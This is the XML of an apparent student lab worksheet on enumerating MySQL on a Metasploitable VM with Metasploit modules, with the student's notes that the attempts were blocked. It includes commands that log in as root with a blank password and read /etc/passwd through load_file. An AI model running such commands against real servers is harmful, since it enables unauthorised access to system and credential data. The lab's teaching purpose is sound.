          <w:ilvl w:val="0"/>
          <w:numId w:val="3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&gt; search mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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auxiliary(mysql_sql) &gt; use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/admin/mysql/mysql_sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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auxiliary(mysql_sql) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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auxiliary(mysql_sql) &gt; set RHOSTS [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address of the Metasplotable VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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auxiliary(mysql_sql) &gt; set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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auxiliary(mysql_sql) &gt; set BLANK_PASSWORDS true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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auxiliary(mysql_sql) &gt; set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL select load_file(\'/etc/passwd\')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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auxiliary(mysql_sql) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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Take a screenshot of the outcome. Explain what you have done and accomplished. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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With these set of commands, I'm trying to access the User names and Passwrods stored on the server and if successful to write the onfo to a text document so I can see the  information.. Again the Server Blocked by the remote Host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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understand the structure of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, go to: </w:t>
      </w:r>
      <w:hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="docRId15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="0"/>
            <w:position w:val="0"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/</w:t>
        </w:r>
      </w:hyperlink>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auxiliary(mysql_sql) &gt; set sql show databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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Take a screenshot of the outcome. Explain what you have done and accomplished.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120" w:after="12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Task 3: Enumerating MySQL Users (2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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&gt; search mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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auxiliary(mysql_enum) &gt; use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/admin/mysql/mysql_enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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auxiliary(mysql_enum) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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auxiliary(mysql_enum) &gt; set RHOSTS [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address of the Metasplotable VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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auxiliary(mysql_enum) &gt; set USERNAME root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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auxiliary(mysql_enum) &gt; set BLANK_PASSWORDS true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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auxiliary(mysql_enum) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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Take a screenshot of the outcome. Explain what you have done and accomplished. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="720" w:hanging="36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Enumeration is defined as a process which establishes an active connection to the target hosts to discover potential attack vectors in the system, and the same can be used for further exploitation of the system. Enumeration is used to gather the following: Usernames, group names. Hostnames. I was again Blocked by the Server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200" w:line="276"/>
        <w:ind w:right="0" w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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auxiliary(mysql_enum) &gt; exit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4">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="78"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="41">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embeddings/oleObject2.bin" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship Target="media/image3.wmf" Id="docRId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="https://null-byte.wonderhowto.com/how-to/enumerate-mysql-databases-with-metasploit-0203485/" Id="docRId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://www.youtube.com/watch?v=LaJXxtmUX9g" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image1.wmf" Id="docRId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="https://www.offensive-security.com/metasploit-unleashed/armitage-setup/" Id="docRId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject4.bin" Id="docRId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /><Relationship TargetMode="External" Target="https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/" Id="docRId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"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www.metasploit.com/" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="media/image4.wmf" Id="docRId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="numbering.xml" Id="docRId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" /><Relationship Target="media/image0.wmf" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship Target="media/image2.wmf" Id="docRId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" /><Relationship TargetMode="External" Target="https://charlesreid1.com/wiki/Metasploitable/MySQL" Id="docRId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="embeddings/oleObject0.bin" Id="docRId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" /></Relationships>
</file>